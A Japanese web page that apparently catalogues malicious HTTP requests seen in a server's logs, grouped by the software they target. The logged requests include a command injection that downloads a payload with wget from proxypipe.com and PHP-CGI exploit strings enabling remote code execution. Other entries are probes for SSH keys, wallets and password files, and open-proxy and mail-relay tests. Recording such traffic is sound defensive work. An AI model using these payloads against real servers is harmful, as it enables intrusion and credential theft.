変なアクセス

Apache

/icons/apache_pb.gif
/webdav/
"\x80w\x01\x03\x01"  (HTTPメソッドなし。HTTPポートにSSL/TLSのClientHelloが送られてきたものと思われる)
/?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day;

Bitcoin

/db/.bitcoin/wallet.dat
/.bitcoin/wallet.dat

ColdFusion

/CFIDE/administrator/enter.cfm

Drupal

/user/soapCaller.bs

EPGrec

/epgrec/js/jquery.validate.min.js
/epgrec/do-record.sh
/epgrec/systemSetting.php
/epgrec/gen-thumbnail.sh

FCKeditor

/Fckeditor/editor/filemanager/browser/default/connectors/test.html
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html
/editor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/admin/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html
/editor/editor/filemanager/browser/default/connectors/uploadtest.html

foltia

/foltia/

horde

//
//horde/
//imp/
//horde/imp/
//webmail/
//mail/
//email/
//horde-webmail/
//horde/mimp/
//mimp/

IE11

/browserconfig.xml

JBOSS

/web-console/ServerInfo.jsp
/jmx-console/

Linksysルーター

/HNAP1/

PHP(CGI版PHPにクエリ文字列でコマンドラインオプション -d ... を渡そうとするリクエスト。「->」の行はURLデコードしたもの)

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
 -> /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
//cgi-bin/php
//cgi-bin/php5
//cgi-bin/php-cgi
//cgi-bin/php.cgi
//cgi-bin/php4
"GET /cgi-bin/php

phpMyAdmin

/phpMyAdmin/scripts/setup.php
/pma/scripts/setup.php
/myadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/phpmyadmin/scripts/setup.php
/pma/scripts/setup.php
/myadmin/scripts/setup.php
/MyAdmin/scripts/setup.php
/PHPMYADMIN/scripts/setup.php
/pMA/scripts/setup.php
/PMA/scripts/setup.php
/SQL/scripts/setup.php
/db/scripts/setup.php
/dbadmin/scripts/setup.php
/pHpMyAdMiN/scripts/setup.php
/pma/scripts/setup.php
/sql/scripts/setup.php
/MySQLAdmin/scripts/setup.php
/web/scripts/setup.php
/websql/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
/apache-default/phpmyadmin/scripts/setup.php
/blog/phpmyadmin/scripts/setup.php
/cpanelphpmyadmin/scripts/setup.php
/cpphpmyadmin/scripts/setup.php
/forum/phpmyadmin/scripts/setup.php
/admin/scripts/setup.php
/admin/pma/scripts/setup.php
/admin/phpmyadmin/scripts/setup.php
/db/scripts/setup.php
/dbadmin/scripts/setup.php

Tomcat

/manager/html
/invoker/EJBInvokerServlet

TYPO3

/typo3/index.php

WordPress

/blog/xmlrpc.php
/Blogxmlrpc.php
/myblog/xmlrpc.php
/word/xmlrpc.php
/wordpress/xmlrpc.php
/Wordpress/xmlrpc.php
/xmlrpc.php
/wp-login.php

sshなど(秘密鍵・シェル履歴・ウォレット・パスワードファイルがWeb公開されていないかを探るものと思われる)

/checknfurl123
/.ssh/id_rsa
/.ssh/id_dsa
/.ssh/rsa
/.ssh/dsa
/.ssh/key
/.ssh/priv
/.ssh/id_rsa.old
/.ssh/id_dsa.old
/.ssh/identity
/.ssh/authorized_keys
/.ssh/authorized_keys2
/.ssh/known_hosts
/.ssh/config
/.ssh/config.old
/.ssh/config~
/.ssh/id_rsa.pub
/.ssh/id_dsa.pub
/.ssh/id_rsa_2
/.ssh/id_rsa.2
/.ssh/id_dsa_2
/.ssh/id_dsa.2
/.ssh/id_ecdsa
/.ssh/id_ecdsa.2
/.ssh/id_ecdsa_2
/.ssh/id_rsa2
/.ssh/id_dsa2
/.ssh/id_ecdsa2
/.ssh/id_ecdsa_old
/.ssh/id_ecdsa.old
/.ssh/id_rsa.bak
/.ssh/id_dsa.bak
/.bash_history
/.history
/.sh_history
/.bitcoin/wallet.dat
/.litecoin/wallet.dat
/.psi/profiles/default/config.xml
/.purple/accounts.xml
/.mozilla/firefox/profiles.ini
/id_ecdsa
/id_ecdsa.2
/id_ecdsa_2
/id_ecdsa_old
/id_ecdsa.old
/config
/id_rsa
/id_dsa
/rsa
/dsa
/key
/key.priv
/id_rsa.old
/id_dsa.old
/identity
/authorized_keys
/authorized_keys2
/known_hosts
/id_rsa.pub
/id_dsa.pub
/.htpasswd
/htpasswd
/.htpasswd~
/passwd
/.passwd
/passwords
/password
/passwords.txt
/pass

踏み台調査?(オープンプロキシやメール中継として使えるかどうかの確認と思われる)

CONNECT mx0.mail2000.com.tw:25
CONNECT mx2.mail2000.com.tw:25
CONNECT mx3.mail2000.com.tw:25
CONNECT mta6.am0.yahoodns.net:25
http://37.28.156.211/sprawdza.php
http://hotel.qunar.com/render/hoteldiv.jsp?&__jscallback=XQScript_4 
http://www.baidu.com/
http://www.daydaydata.com/proxy.txt
http://todd0738.gotoip4.com//hello.html
http://www.google.com/
http://24x7-allrequestsallowed.com/?PHPSESSID=1rxsxtj500143PUVJW%5EEY%40MFVFV
http://z.nixipdb.com/
http://www.google.pl/search?q=wakacje
http://92.222.28.46/httptest.php
http://httpheader.net
http://www.k2proxy.com//hello.html
http://www.taobao.com/

不明

/phpTest/zologize/axa.php
/admin.php
/administrator/index.php
/administrator/
/admin/index.php
/rutorrent
/abcdefghijk.php
/rxcx.php
/cgi-bin/rtpd.cgi?/bin/busybox
/con/trust/
/rom-0
/index.asp?request=Ch&index=0
/notify.php
/xnotify.php
/x.php
/cx.php
/chck.php
/docs/funcspecs/3.jsp
/live/lnws/workflow4/mnf.m3u8?ct=4&se=jiangsu
/css/epg.css
/api/
/Droid/login.php
/rat/login.php
/master/login.php
/cp.php?m=login
/w00tw00t.at.blackhats.romanian.anti-sec:)

